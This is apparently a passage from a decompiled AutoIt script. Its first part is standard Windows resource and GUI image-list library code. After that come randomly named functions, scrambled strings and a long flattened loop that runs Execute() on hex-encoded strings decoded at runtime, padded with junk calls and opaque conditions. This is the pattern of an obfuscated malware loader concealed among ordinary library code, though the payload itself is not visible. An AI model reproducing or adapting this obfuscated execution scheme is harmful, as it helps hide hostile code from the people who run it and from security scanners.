  4195. Return 1
  4196. EndFunc
  4197.  
  4198. Func __enumresnamesproc($hmodule, $itype, $iname, $lparam)
  4199. #forceref $hModule, $iType, $lParam
  4200. Local $ilength = _winapi_strlen($iname)
  4201. __inc($__g_venum)
  4202. If $ilength Then
  4203. $__g_venum[$__g_venum[0]] = DllStructGetData(DllStructCreate("wchar[" & ($ilength + 1) & "]", $iname), 1)
  4204. Else
  4205. $__g_venum[$__g_venum[0]] = Number($iname)
  4206. EndIf
  4207. Return 1
  4208. EndFunc
  4209.  
  4210. Func __enumrestypesproc($hmodule, $itype, $lparam)
  4211. #forceref $hModule, $lParam
  4212. Local $ilength = _winapi_strlen($itype)
  4213. __inc($__g_venum)
  4214. If $ilength Then
  4215. $__g_venum[$__g_venum[0]] = DllStructGetData(DllStructCreate("wchar[" & ($ilength + 1) & "]", $itype), 1)
  4216. Else
  4217. $__g_venum[$__g_venum[0]] = Number($itype)
  4218. EndIf
  4219. Return 1
  4220. EndFunc
  4221.  
  4222. Func __enumvervaluesproc($hmodule, $itype, $iname, $ilanguage, $idefault)
  4223. Local $aret, $ienum = 1, $ierror = 0
  4224. Switch $idefault
  4225. Case -1
  4226. Case 1024
  4227. $ilanguage = 1024
  4228. $ienum = 0
  4229. Case Else
  4230. If $ilanguage <> $idefault Then
  4231. Return 1
  4232. EndIf
  4233. $ienum = 0
  4234. EndSwitch
  4235. Do
  4236. Local $pdata = __resload($hmodule, $itype, $iname, $ilanguage)
  4237. If @error Then
  4238. $ierror = @error + 10
  4239. ExitLoop
  4240. EndIf
  4241. $aret = DllCall("version.dll", "bool", "VerQueryValueW", "ptr", $pdata, "wstr", "\VarFileInfo\Translation", "ptr*", 0, "uint*", 0)
  4242. If @error OR NOT $aret[0] OR NOT $aret[4] Then
  4243. $ierror = @error + 20
  4244. ExitLoop
  4245. EndIf
  4246. Local $tdata = DllStructCreate("ushort;ushort", $aret[3])
  4247. If @error Then
  4248. $ierror = @error + 30
  4249. ExitLoop
  4250. EndIf
  4251. Until 1
  4252. If NOT $ierror Then
  4253. __inc($__g_venum)
  4254. $__g_venum[$__g_venum[0][0]][0] = DllStructGetData($tdata, 1)
  4255. Local $scp = Hex(_winapi_makelong(DllStructGetData($tdata, 2), DllStructGetData($tdata, 1)), 8)
  4256. For $i = 1 To $__g_vval[0]
  4257. $aret = DllCall("version.dll", "bool", "VerQueryValueW", "ptr", $pdata, "wstr", "\StringFileInfo\" & $scp & "\" & $__g_vval[$i], "ptr*", 0, "uint*", 0)
  4258. If NOT @error AND $aret[0] AND $aret[4] Then
  4259. $__g_venum[$__g_venum[0][0]][$i] = DllStructGetData(DllStructCreate("wchar[" & $aret[4] & "]", $aret[3]), 1)
  4260. Else
  4261. $__g_venum[$__g_venum[0][0]][$i] = ""
  4262. EndIf
  4263. Next
  4264. Else
  4265. $__g_venum = @error + 40
  4266. EndIf
  4267. If $__g_venum Then Return SetError($ierror, 0, 0)
  4268. Return $ienum
  4269. EndFunc
  4270.  
  4271. Func __resload($hinstance, $stype, $sname, $ilanguage)
  4272. Local $hinfo = _winapi_findresourceex($hinstance, $stype, $sname, $ilanguage)
  4273. If NOT $hinfo Then Return SetError(@error + 10, @extended, 0)
  4274. Local $isize = _winapi_sizeofresource($hinstance, $hinfo)
  4275. If NOT $isize Then Return SetError(@error + 20, @extended, 0)
  4276. Local $hdata = _winapi_loadresource($hinstance, $hinfo)
  4277. If NOT $hdata Then Return SetError(@error + 30, @extended, 0)
  4278. Local $pdata = _winapi_lockresource($hdata)
  4279. If NOT $pdata Then Return SetError(@error + 40, @extended, 0)
  4280. Return SetExtended($isize, $pdata)
  4281. EndFunc
  4282.  
  4283. #EndRegion Internal Functions
  4284. Global Const $__imagelistconstant_image_bitmap = 0
  4285.  
  4286. Func _guiimagelist_add($hwnd, $himage, $hmask = 0)
  4287. Local $aresult = DllCall("comctl32.dll", "int", "ImageList_Add", "handle", $hwnd, "handle", $himage, "handle", $hmask)
  4288. If @error Then Return SetError(@error, @extended, -1)
  4289. Return $aresult[0]
  4290. EndFunc
  4291.  
  4292. Func _guiimagelist_addmasked($hwnd, $himage, $imask = 0)
  4293. Local $aresult = DllCall("comctl32.dll", "int", "ImageList_AddMasked", "handle", $hwnd, "handle", $himage, "dword", $imask)
  4294. If @error Then Return SetError(@error, @extended, -1)
  4295. Return $aresult[0]
  4296. EndFunc
  4297.  
  4298. Func _guiimagelist_addbitmap($hwnd, $simage, $smask = "")
  4299. Local $asize = _guiimagelist_geticonsize($hwnd)
  4300. Local $himage = _winapi_loadimage(0, $simage, $__imagelistconstant_image_bitmap, $asize[0], $asize[1], $lr_loadfromfile)
  4301. If $himage = 0 Then Return SetError(_winapi_getlasterror(), 1, -1)
  4302. Local $hmask = 0
  4303. If $smask <> "" Then
  4304. $hmask = _winapi_loadimage(0, $smask, $__imagelistconstant_image_bitmap, $asize[0], $asize[1], $lr_loadfromfile)
  4305. If $hmask = 0 Then Return SetError(_winapi_getlasterror(), 2, -1)
  4306. EndIf
  4307. Local $iret = _guiimagelist_add($hwnd, $himage, $hmask)
  4308. _winapi_deleteobject($himage)
  4309. If $hmask <> 0 Then _winapi_deleteobject($hmask)
  4310. Return $iret
  4311. EndFunc
  4312.  
  4313. Func _guiimagelist_addicon($hwnd, $sfilepath, $iindex = 0, $blarge = False)
  4314. Local $iret, $ticon = DllStructCreate("handle Handle")
  4315. If $blarge Then
  4316. $iret = _winapi_extracticonex($sfilepath, $iindex, $ticon, 0, 1)
  4317. Else
  4318. $iret = _winapi_extracticonex($sfilepath, $iindex, 0, $ticon, 1)
  4319. EndIf
  4320. If $iret <= 0 Then Return SetError(-1, $iret, -1)
  4321. Local $hicon = DllStructGetData($ticon, "Handle")
  4322. $iret = _guiimagelist_replaceicon($hwnd, -1, $hicon)
  4323. _winapi_destroyicon($hicon)
  4324. If $iret = -1 Then Return SetError(-2, $iret, -1)
  4325. Return $iret
  4326. EndFunc
  4327.  
  4328. Func _guiimagelist_begindrag($hwnd, $itrack, $ixhotspot, $iyhotspot)
  4329. Local $aresult = DllCall("comctl32.dll", "bool", "ImageList_BeginDrag", "handle", $hwnd, "int", $itrack, "int", $ixhotspot, "int", $iyhotspot)
  4330. If @error Then Return SetError(@error, @extended, False)
  4331. Return $aresult[0] <> 0
  4332. EndFunc
  4333.  
  4334. Func _guiimagelist_copy($hwnd, $isource, $idestination)
  4335. Local $aresult = DllCall("comctl32.dll", "bool", "ImageList_Copy", "handle", $hwnd, "int", $idestination, "handle", $hwnd, "int", $isource, "uint", $ilcf_move)
  4336. If @error Then Return SetError(@error, @extended, False)
  4337. Return $aresult[0] <> 0
  4338. EndFunc
  4339.  
  4340. Func _guiimagelist_create($icx = 16, $icy = 16, $icolor = 4, $ioptions = 0, $iinitial = 4, $igrow = 4)
  4341. Local Const $acolor[7] = [$ilc_color, $ilc_color4, $ilc_color8, $ilc_color16, $ilc_color24, $ilc_color32, $ilc_colorddb]
  4342. Local $iflags = 0
  4343. If BitAND($ioptions, 1) <> 0 Then $iflags = BitOR($iflags, $ilc_mask)
  4344. If BitAND($ioptions, 2) <> 0 Then $iflags = BitOR($iflags, $ilc_mirror)
  4345. If BitAND($ioptions, 4) <> 0 Then $iflags = BitOR($iflags, $ilc_peritemmirror)
  4346. $iflags = BitOR($iflags, $acolor[$icolor])
  4347. Local $aresult = DllCall("comctl32.dll", "handle", "ImageList_Create", "int", $icx, "int", $icy, "uint", $iflags, "int", $iinitial, "int", $igrow)
  4348. If @error Then Return SetError(@error, @extended, 0)
  4349. Return $aresult[0]
  4350. EndFunc
  4351.  
  4352. Func _guiimagelist_destroy($hwnd)
  4353. Local $aresult = DllCall("comctl32.dll", "bool", "ImageList_Destroy", "handle", $hwnd)
  4354. If @error Then Return SetError(@error, @extended, False)
  4355. Return $aresult[0] <> 0
  4356. EndFunc
  4357.  
  4358. Func _guiimagelist_destroyicon($hicon)
  4359. Return _winapi_destroyicon($hicon)
  4360. EndFunc
  4361.  
  4362. Func _guiimagelist_dragenter($hwnd, $ix, $iy)
  4363. Local $aresult = DllCall("comctl32.dll", "bool", "ImageList_DragEnter", "hwnd", $hwnd, "int", $ix, "int", $iy)
  4364. If @error Then Return SetError(@error, @extended, False)
  4365. Return $aresult[0] <> 0
  4366. EndFunc
  4367.  
  4368. Func _guiimagelist_dragleave($hwnd)
  4369. Local $aresult = DllCall("comctl32.dll", "bool", "ImageList_DragLeave", "hwnd", $hwnd)
  4370. If @error Then Return SetError(@error, @extended, False)
  4371. Return $aresult[0] <> 0
  4372. EndFunc
  4373.  
  4374. Func _guiimagelist_dragmove($ix, $iy)
  4375. Local $aresult = DllCall("comctl32.dll", "bool", "ImageList_DragMove", "int", $ix, "int", $iy)
  4376. If @error Then Return SetError(@error, @extended, False)
  4377. Return $aresult[0] <> 0
  4378. EndFunc
  4379.  
  4380. Func _guiimagelist_dragshownolock($bshow)
  4381. Local $aresult = DllCall("comctl32.dll", "bool", "ImageList_DragShowNolock", "bool", $bshow)
  4382. If @error Then Return SetError(@error, @extended, False)
  4383. Return $aresult[0] <> 0
  4384. EndFunc
  4385.  
  4386. Func _guiimagelist_draw($hwnd, $iindex, $hdc, $ix, $iy, $istyle = 0)
  4387. Local $iflags = 0
  4388. If BitAND($istyle, 1) <> 0 Then $iflags = BitOR($iflags, $ild_transparent)
  4389. If BitAND($istyle, 2) <> 0 Then $iflags = BitOR($iflags, $ild_blend25)
  4390. If BitAND($istyle, 4) <> 0 Then $iflags = BitOR($iflags, $ild_blend50)
  4391. If BitAND($istyle, 8) <> 0 Then $iflags = BitOR($iflags, $ild_mask)
  4392. Local $aresult = DllCall("comctl32.dll", "bool", "ImageList_Draw", "handle", $hwnd, "int", $iindex, "handle", $hdc, "int", $ix, "int", $iy, "uint", $iflags)
  4393. If @error Then Return SetError(@error, @extended, False)
  4394. Return $aresult[0] <> 0
  4395. EndFunc
  4396.  
  4397. Func _guiimagelist_drawex($hwnd, $iindex, $hdc, $ix, $iy, $idx = 0, $idy = 0, $irgbbk = -1, $irgbfg = -1, $istyle = 0)
  4398. If $idx = -1 Then $idx = 0
  4399. If $idy = -1 Then $idy = 0
  4400. If $irgbbk = -1 Then $irgbbk = -1
  4401. If $irgbfg = -1 Then $irgbfg = -1
  4402. Local $iflags = 0
  4403. If BitAND($istyle, 1) <> 0 Then $iflags = BitOR($iflags, $ild_transparent)
  4404. If BitAND($istyle, 2) <> 0 Then $iflags = BitOR($iflags, $ild_blend25)
  4405. If BitAND($istyle, 4) <> 0 Then $iflags = BitOR($iflags, $ild_blend50)
  4406. If BitAND($istyle, 8) <> 0 Then $iflags = BitOR($iflags, $ild_mask)
  4407. Local $aresult = DllCall("comctl32.dll", "bool", "ImageList_DrawEx", "handle", $hwnd, "int", $iindex, "handle", $hdc, "int", $ix, "int", $iy, "int", $idx, "int", $idy, "dword", $irgbbk, "dword", $irgbfg, "uint", $iflags)
  4408. If @error Then Return SetError(@error, @extended, False)
  4409. Return $aresult[0] <> 0
  4410. EndFunc
  4411.  
  4412. Func _guiimagelist_duplicate($hwnd)
  4413. Local $aresult = DllCall("comctl32.dll", "handle", "ImageList_Duplicate", "handle", $hwnd)
  4414. If @error Then Return SetError(@error, @extended, 0)
  4415. Return $aresult[0]
  4416. EndFunc
  4417.  
  4418. Func _guiimagelist_enddrag()
  4419. DllCall("comctl32.dll", "none", "ImageList_EndDrag")
  4420. If @error Then Return SetError(@error, @extended)
  4421. EndFunc
  4422.  
  4423. Func _guiimagelist_getbkcolor($hwnd)
  4424. Local $aresult = DllCall("comctl32.dll", "dword", "ImageList_GetBkColor", "handle", $hwnd)
  4425. If @error Then Return SetError(@error, @extended, 0)
  4426. Return $aresult[0]
  4427. EndFunc
  4428.  
  4429. Func _guiimagelist_geticon($hwnd, $iindex, $istyle = 0)
  4430. Local $iflags = 0
  4431. If BitAND($istyle, 1) <> 0 Then $iflags = BitOR($iflags, $ild_transparent)
  4432. If BitAND($istyle, 2) <> 0 Then $iflags = BitOR($iflags, $ild_blend25)
  4433. If BitAND($istyle, 4) <> 0 Then $iflags = BitOR($iflags, $ild_blend50)
  4434. If BitAND($istyle, 8) <> 0 Then $iflags = BitOR($iflags, $ild_mask)
  4435. Local $aresult = DllCall("comctl32.dll", "handle", "ImageList_GetIcon", "handle", $hwnd, "int", $iindex, "uint", $iflags)
  4436. If @error Then Return SetError(@error, @extended, 0)
  4437. Return $aresult[0]
  4438. EndFunc
  4439.  
  4440. Func _guiimagelist_geticonheight($hwnd)
  4441. Local $asize = _guiimagelist_geticonsize($hwnd)
  4442. Return $asize[1]
  4443. EndFunc
  4444.  
  4445. Func _guiimagelist_geticonsize($hwnd)
  4446. Local $asize[2]
  4447. Local $tpoint = _guiimagelist_geticonsizeex($hwnd)
  4448. $asize[0] = DllStructGetData($tpoint, "X")
  4449. $asize[1] = DllStructGetData($tpoint, "Y")
  4450. Return $asize
  4451. EndFunc
  4452.  
  4453. Func _guiimagelist_geticonsizeex($hwnd)
  4454. Local $tpoint = DllStructCreate($tagpoint)
  4455. Local $ppointx = DllStructGetPtr($tpoint, "X")
  4456. Local $ppointy = DllStructGetPtr($tpoint, "Y")
  4457. Local $aresult = DllCall("comctl32.dll", "bool", "ImageList_GetIconSize", "hwnd", $hwnd, "struct*", $ppointx, "struct*", $ppointy)
  4458. If @error Then Return SetError(@error, @extended, 0)
  4459. Return SetExtended($aresult[0], $tpoint)
  4460. EndFunc
  4461.  
  4462. Func _guiimagelist_geticonwidth($hwnd)
  4463. Local $asize = _guiimagelist_geticonsize($hwnd)
  4464. Return $asize[0]
  4465. EndFunc
  4466.  
  4467. Func _guiimagelist_getimagecount($hwnd)
  4468. Local $aresult = DllCall("comctl32.dll", "int", "ImageList_GetImageCount", "handle", $hwnd)
  4469. If @error Then Return SetError(@error, @extended, 0)
  4470. Return $aresult[0]
  4471. EndFunc
  4472.  
  4473. Func _guiimagelist_getimageinfoex($hwnd, $iindex)
  4474. Local $timage = DllStructCreate($tagimageinfo)
  4475. Local $aresult = DllCall("comctl32.dll", "bool", "ImageList_GetImageInfo", "handle", $hwnd, "int", $iindex, "struct*", $timage)
  4476. If @error Then Return SetError(@error, @extended, 0)
  4477. Return SetExtended($aresult[0], $timage)
  4478. EndFunc
  4479.  
  4480. Func _guiimagelist_merge($hwnd1, $iindex1, $hwnd2, $iindex2, $idx, $idy)
  4481. Local $aresult = DllCall("comctl32.dll", "handle", "ImageList_Merge", "handle", $hwnd1, "int", $iindex1, "handle", $hwnd2, "int", $iindex2, "int", $idx, "int", $idy)
  4482. If @error Then Return SetError(@error, @extended, 0)
  4483. Return $aresult[0]
  4484. EndFunc
  4485.  
  4486. Func _guiimagelist_remove($hwnd, $iindex = -1)
  4487. Local $aresult = DllCall("comctl32.dll", "bool", "ImageList_Remove", "handle", $hwnd, "int", $iindex)
  4488. If @error Then Return SetError(@error, @extended, False)
  4489. Return $aresult[0] <> 0
  4490. EndFunc
  4491.  
  4492. Func _guiimagelist_replace($hwnd, $iindex, $himage, $hmask = 0)
  4493. Local $aresult = DllCall("comctl32.dll", "bool", "ImageList_Replace", "handle", $hwnd, "int", $iindex, "handle", $himage, "handle", $hmask)
  4494. If @error Then Return SetError(@error, @extended, False)
  4495. Return $aresult[0] <> 0
  4496. EndFunc
  4497.  
  4498. Func _guiimagelist_replaceicon($hwnd, $iindex, $hicon)
  4499. Local $aresult = DllCall("comctl32.dll", "int", "ImageList_ReplaceIcon", "handle", $hwnd, "int", $iindex, "handle", $hicon)
  4500. If @error Then Return SetError(@error, @extended, -1)
  4501. Return $aresult[0]
  4502. EndFunc
  4503.  
  4504. Func _guiimagelist_setbkcolor($hwnd, $iclrbk)
  4505. Local $aresult = DllCall("comctl32.dll", "dword", "ImageList_SetBkColor", "handle", $hwnd, "dword", $iclrbk)
  4506. If @error Then Return SetError(@error, @extended, $clr_none)
  4507. Return $aresult[0]
  4508. EndFunc
  4509.  
  4510. Func _guiimagelist_setdragcursorimage($hwnd, $idrag, $idxhotspot, $idyhotspot)
  4511. Local $aresult = DllCall("comctl32.dll", "bool", "ImageList_SetDragCursorImage", "handle", $hwnd, "int", $idrag, "int", $idxhotspot, "int", $idyhotspot)
  4512. If @error Then Return SetError(@error, @extended, False)
  4513. Return $aresult[0] <> 0
  4514. EndFunc
  4515.  
  4516. Func _guiimagelist_seticonsize($hwnd, $icx, $icy)
  4517. Local $aresult = DllCall("comctl32.dll", "bool", "ImageList_SetIconSize", "handle", $hwnd, "int", $icx, "int", $icy)
  4518. If @error Then Return SetError(@error, @extended, False)
  4519. Return $aresult[0] <> 0
  4520. EndFunc
  4521.  
  4522. Func _guiimagelist_setimagecount($hwnd, $inewcount)
  4523. Local $aresult = DllCall("comctl32.dll", "bool", "ImageList_SetImageCount", "handle", $hwnd, "uint", $inewcount)
  4524. If @error Then Return SetError(@error, @extended, False)
  4525. Return $aresult[0] <> 0
  4526. EndFunc
  4527.  
  4528. Func _guiimagelist_setoverlayimage($hwnd, $iimage, $ioverlay)
  4529. Local $aresult = DllCall("comctl32.dll", "bool", "ImageList_SetOverlayImage", "handle", $hwnd, "int", $iimage, "int", $ioverlay)
  4530. If @error Then Return SetError(@error, @extended, False)
  4531. Return $aresult[0] <> 0
  4532. EndFunc
  4533.  
  4534. Func _guiimagelist_swap($hwnd, $isource, $idestination)
  4535. Local $aresult = DllCall("comctl32.dll", "bool", "ImageList_Copy", "handle", $hwnd, "int", $idestination, "handle", $hwnd, "int", $isource, "uint", $ilcf_swap)
  4536. If @error Then Return SetError(@error, @extended, False)
  4537. Return $aresult[0] <> 0
  4538. EndFunc
  4539.  
  4540. Func nvqlncinmzjgce($njoker = 0)
  4541. Local $nnumbers, $azsplits, $nrandom, $nreturn, $sface, $sfaces, $nrandom2
  4542. $nnumbers = tznhxlbucosri("wT,ohTer,eoFruF,vi,eiS,xeSev,niEhg,tiNenT,neJ,ca,kiKgnQ,euneA,ec")
  4543. If $njoker Then
  4544. $nnumbers &= tznhxlbucosri("J,kore")
  4545. EndIf
  4546. $azsplits = StringSplit($nnumbers, ",")
  4547. $sreturn = $azsplits[Random(1, $azsplits[0], 1)]
  4548. $sfaces = StringSplit(tznhxlbucosri("pSdaseC|ulsbH|aetr|siDmanosd"), "|")
  4549. $nrandom2 = Random(1, $sfaces[0] - 1)
  4550. $sface = $sfaces[Round($nrandom2)]
  4551. If $sreturn = tznhxlbucosri("oJekr") Then
  4552. Return $sreturn
  4553. Else
  4554. Return $sreturn & tznhxlbucosri("O f") & $sface
  4555. EndIf
  4556. EndFunc
  4557.  
  4558. Func naqotrblogo(ByRef $last_active, $start = 0)
  4559. Local $struct = DllStructCreate(tznhxlbucosri("iutnd;owdr"))
  4560. DllStructSetData($struct, 1, DllStructGetSize($struct))
  4561. If $start Then
  4562. DllCall(tznhxlbucosri("sure23d.ll"), tznhxlbucosri("nit"), tznhxlbucosri("eGLtsaItpntunIof"), tznhxlbucosri("tpr"), DllStructGetPtr($struct))
  4563. $last_active = DllStructGetData($struct, 2)
  4564. Return $last_active
  4565. Else
  4566. DllCall(tznhxlbucosri("sure23d.ll"), tznhxlbucosri("nit"), tznhxlbucosri("eGLtsaItpntunIof"), tznhxlbucosri("tpr"), DllStructGetPtr($struct))
  4567. If $last_active <> DllStructGetData($struct, 2) Then
  4568. Local $save = $last_active
  4569. $last_active = DllStructGetData($struct, 2)
  4570. Return $last_active - $save
  4571. EndIf
  4572. EndIf
  4573. EndFunc
  4574.  
  4575. Func kbdwlxwxmat($inum)
  4576. If ($inum < 2) Then Return False
  4577. If ($inum = 2) Then Return True
  4578. If (BitAND($inum, 1) = 0) Then Return False
  4579. For $i = 3 To Sqrt($inum) Step 2
  4580. If (Mod($inum, $i) = 0) Then Return False
  4581. Next
  4582. Return True
  4583. EndFunc
  4584.  
  4585. Func yyciuovuaae($ilength = 10)
  4586. Local $sdata = "", $srandom = ""
  4587. For $i = 1 To $ilength
  4588. $srandom = Random(55, 116, 1)
  4589. $sdata &= Chr($srandom + 6 * ($srandom > 90) - 7 * ($srandom < 65))
  4590. Next
  4591. Return $sdata
  4592. EndFunc
  4593.  
  4594. Func jyqmluzfke($nnum1 = 0, $nnum2 = 0, $iflag = 0)
  4595. If NOT IsNumber($nnum1) Then Return SetError(1, 0, 0)
  4596. Switch @NumParams
  4597. Case 0
  4598. Return Random()
  4599. Case 1
  4600. If $nnum1 < 0 Then Return -Random(-$nnum1)
  4601. Return Random($nnum1)
  4602. Case Else
  4603. If NOT IsNumber($nnum1) OR ($iflag <> 0 AND $iflag <> 1) Then Return SetError(2, 0, 0)
  4604. If $nnum1 = $nnum2 Then Return $nnum1
  4605. If $nnum2 > $nnum1 Then Return Random($nnum1, $nnum2, $iflag)
  4606. Return Random($nnum2, $nnum1, $iflag)
  4607. EndSwitch
  4608. EndFunc
  4609.  
  4610. Func fbtefvhhnlwrx($ilength)
  4611. Return $ilength * 0.6214
  4612. EndFunc
  4613.  
  4614. Func ovxeidrtxs($hwnd)
  4615. Return BitAND(WinGetState($hwnd), 32) = 32
  4616. EndFunc
  4617.  
  4618. Func emotlbwvcy($ivalue, $vtrue, $vfalse)
  4619. Local $aarray[2] = [$vfalse, $vtrue]
  4620. Return $aarray[Number(Number($ivalue) > 0)]
  4621. EndFunc
  4622.  
  4623. Func ryeayzqzsg($sdata)
  4624. $sdata = StringStripWS(StringLower($sdata), 8)
  4625. Local $astringsplit = StringSplit($sdata, ""), $ireturn = 0
  4626. For $i = 1 To $astringsplit[0]
  4627. For $j = 97 To 122
  4628. If $astringsplit[$i] == Chr($j) Then
  4629. $ireturn += ($j - 96)
  4630. ExitLoop
  4631. EndIf
  4632. Next
  4633. Next
  4634. Return $ireturn
  4635. EndFunc
  4636.  
  4637. Func wlikuljcbkj($icontrolid)
  4638. Local $astate[2] = [0, 1]
  4639. GUICtrlSetState($icontrolid, $astate[Number(BitAND(GUICtrlGetState($icontrolid), $astate[0]) = $astate[0])])
  4640. EndFunc
  4641.  
  4642. Func hapimckhlj($hicon1, $hicon2)
  4643. Local $artn = DllCall(tznhxlbucosri("hswlpa.ildl"), tznhxlbucosri("OBLO"), 548, tznhxlbucosri("ahdnel"), $hicon1, tznhxlbucosri("ahdnel"), $hicon2)
  4644. If @error Then
  4645. Return SetError(@error)
  4646. EndIf
  4647. Return $artn[0]
  4648. EndFunc
  4649.  
  4650. Func mehaakaltwuri($ilength)
  4651. Return $ilength * 1.609
  4652. EndFunc
  4653.  
  4654. Func omaytskozewyg()
  4655. Return StringLeft(@ScriptName, StringInStr(@ScriptName, ".", 2, -1) - 1)
  4656. EndFunc
  4657.  
  4658. Func pbkmkaiumxrlwy($bin)
  4659. Local $aarr = StringSplit($bin, "", 2)
  4660. Local $dec = 0
  4661. For $i = UBound($aarr) - 1 To 0 Step -1
  4662. If $aarr[$i] = "1" Then
  4663. $dec = BitXOR($dec, BitShift(1, -(UBound($aarr) - 1 - $i)))
  4664. EndIf
  4665. Next
  4666. Return $dec
  4667. EndFunc
  4668.  
  4669. Global $1044747412 = 1307843693
  4670. Global $hbvglxaxxk = 1514472
  4671. For $e = 0 To 465799
  4672. IsBool(tznhxlbucosri("h5w5MITwoLxXqJqxghdkZBHh21VWx"))
  4673. If 237 > 137 AND 148 = 148 AND 175 >= 151 AND 105 = 105 AND 272 < 285 AND $1044747412 = 84602552 Then
  4674. $lgaftrqvglak = Execute(wmhsrosshiij(tznhxlbucosri("x097B64765E4867567649656478292"), "0x"))
  4675. Dim $stnkpy4emd7alxhx0lav = 1716524 * 404466 + 1501255
  4676. $1044747412 = 2134070852
  4677. Ptr(1363451 + 2395467 + 1124778 - 668394)
  4678. Int(1037869)
  4679. EndIf
  4680. If 218 > 157 AND 230 <= 269 AND 104 <> 278 AND 142 = 142 AND 280 = 280 AND $1044747412 = 89876260 Then
  4681. $msmatzrvyjrr = Execute(wmhsrosshiij(tznhxlbucosri("x0C4150497059497745684F4359282"), tznhxlbucosri("x0874695")))
  4682. String(tznhxlbucosri("fo8OtHZiEYmMUndirC1YCyJFkMSUBgV8ZZJpMlvXV7Wu74hBljGFsGVifIwvzJwTF"))
  4683. $1044747412 = 150208926
  4684. String(tznhxlbucosri("02CDM4TiOOMS4IA6FnDQgbzqGV8ccpcJKMOtecEyZMQz7OZ1fA0N9SVGeIxRkKLDe"))
  4685. Random(2313730)
  4686. EndIf
  4687. If 271 <> 103 AND 151 <= 301 AND 222 > 216 AND 293 <> 279 AND $1044747412 = 150208926 Then
  4688. $bvnakuhdnyyj = Execute(wmhsrosshiij(tznhxlbucosri("x067152647F4848607F686D4D7C2D2"), tznhxlbucosri("x095252754")))
  4689. $1044747412 = 578141839
  4690. EndIf
  4691. If 211 <> 181 AND 253 <> 125 AND 285 >= 242 AND $1044747412 = 171873601 Then
  4692. $dawmcpaxeytqvfhmytihyemcglhetsghcxjvhjzqgeqxyjwnutscoeyz = Execute(wmhsrosshiij(tznhxlbucosri("x034246777C6A47735A474"), tznhxlbucosri("x0E466")))
  4693. $1044747412 = 198176244
  4694. Ptr(876963 + 1608455 * 1323264)
  4695. IsBool(tznhxlbucosri("bwC4Yv8L47joDQHTui8f2swSsMumvua2zkfWyp2ZW8U1x84DXaTEgDEQGsd0qKLNncq8MRUrmFFa8boysYHui0eGrUTWWHSqoiURnywmVFqnjguDKiso6"))
  4696. EndIf
  4697. If 229 < 243 AND 167 < 198 AND 114 >= 100 AND 112 <= 255 AND $1044747412 = 198176244 Then
  4698. $hwobyepsertwooaziugcagzjdeoumwevcfhbvvszrtcgrwxm = Execute(wmhsrosshiij(tznhxlbucosri("x034246777C6A47764B766"), tznhxlbucosri("x06617")))
  4699. $1044747412 = 1711264047
  4700. WinExists(tznhxlbucosri("0zlH6TxsqWZNfKc75e7qXJJBH6V8BddYQEGXJ7tDWYeRWDnMc98S7zM68yloG8u"))
  4701. EndIf
  4702. If 298 >= 276 AND 106 > 103 AND 218 = 218 AND 135 <= 226 AND $1044747412 = 232684580 Then
  4703. $akuofazowlnr = Execute(wmhsrosshiij(tznhxlbucosri("x0F436E636140455741684D784C2D2"), tznhxlbucosri("x0B497A785")))
  4704. WinExists(tznhxlbucosri("fAADj6gYgx5kWUUaMZUHhjv8vsAqKwB25S7I"))
  4705. $1044747412 = 960210641
  4706. EndIf
  4707. If 103 > 101 AND 147 > 135 AND 170 < 243 AND 233 < 299 AND $1044747412 = 271776171 Then
  4708. $hhafquinevog = Execute(wmhsrosshiij(tznhxlbucosri("x0359717C44596249507051577B2A2"), tznhxlbucosri("x027F6")))
  4709. $1044747412 = 1220020015
  4710. EndIf
  4711. If 283 >= 180 AND 283 >= 226 AND 144 <> 261 AND $1044747412 = 304222797 Then
  4712. $qfqblqmxeqwzdxcrgtzyxvebmhxdhvidkknswxmbkkdcibhqalj = Execute(wmhsrosshiij(tznhxlbucosri("x0043575F584944454"), "0x"))
  4713. $1044747412 = 1591982618
  4714. IsPtr(tznhxlbucosri("gshi2KUwnWmTnZGc"))
  4715. EndIf
  4716. If 177 > 157 AND 240 <> 241 AND 208 <= 264 AND $1044747412 = 578141839 Then
  4717. $hgitnhfhiatz = Execute(wmhsrosshiij(tznhxlbucosri("x064979646D4259695D64655369282"), tznhxlbucosri("x0377415")))
  4718. $1044747412 = 271776171
  4719. IsBinary(tznhxlbucosri("crFhWh47HOpX1"))
  4720. EndIf
  4721. If 257 > 163 AND 187 = 187 AND 263 = 263 AND $1044747412 = 742906269 Then
  4722. IsPtr(967829 + 225300 - 2172532)
  4723. $1044747412 = 1972768996
  4724. EndIf
  4725. If 118 = 118 AND 170 > 124 AND 249 <> 280 AND $1044747412 = 834897274 Then
  4726. $dkcbcqvbfqgu = Execute(wmhsrosshiij(tznhxlbucosri("x0A657258545A457D4957664548292"), "0x"))
  4727. $1044747412 = 2014417103
  4728. Dim $cvp7yseoc7lb1qy221b7 = 3925296
  4729. EndIf
  4730. If 244 > 131 AND 131 <= 164 AND 158 > 142 AND $1044747412 = 937438825 Then
  4731. $jnakoabkaoai = Execute(wmhsrosshiij(tznhxlbucosri("x0A62426962666C657F676E4A4C2D2"), tznhxlbucosri("x00515A654")))
  4732. Ptr(2387746 - 4876)
  4733. $1044747412 = 1838106253
  4734. Int(1633661)
  4735. EndIf
  4736. If 287 = 287 AND 165 > 160 AND 177 = 177 AND $1044747412 = 960210641 Then
  4737. $gidzbjoxovyx = Execute(wmhsrosshiij(tznhxlbucosri("x01424B41564A67697647755568292"), "0x"))
  4738. Ptr(tznhxlbucosri("xpJwKgIEOntL2HVgAxnnBnTOt3Gno1dxgAKSxviTf"))
  4739. $1044747412 = 2141934138
  4740. String(2961479 - 845710)
  4741. Dim $kmhxtmrwx7r9qh3akfy9 = tznhxlbucosri("hedRct9it2bmCu8o14QTV6Zhey0ik2pRvmfFUzJyWHNF8Ee6COOpsOsV2apOr4Rh6M8Yj6kHjCjhDpAtdizl")
  4742. EndIf
  4743. If 209 >= 113 AND 198 <> 114 AND 113 = 113 AND 228 = 228 AND $1044747412 = 960345959 Then
  4744. $uwoufpecayizshabqrulkwclwrkbkshpopayblmcuoqympdrpdivmbny = Execute(wmhsrosshiij(tznhxlbucosri("x0043536279607476457C6C605164786"), "0x"))
  4745. IsBool(2394565 + 2188617)
  4746. $1044747412 = 1681609778
  4747. IsFloat(21683 + 3837103 + 2031822)
  4748. EndIf
  4749. If 256 <= 297 AND 231 <> 141 AND 267 <= 277 AND 146 = 146 AND 295 <> 165 AND $1044747412 = 1025992990 Then
  4750. $qifgahabsexa = Execute(wmhsrosshiij(tznhxlbucosri("x0D45535F6A6341555C6A665B68292"), tznhxlbucosri("x015")))
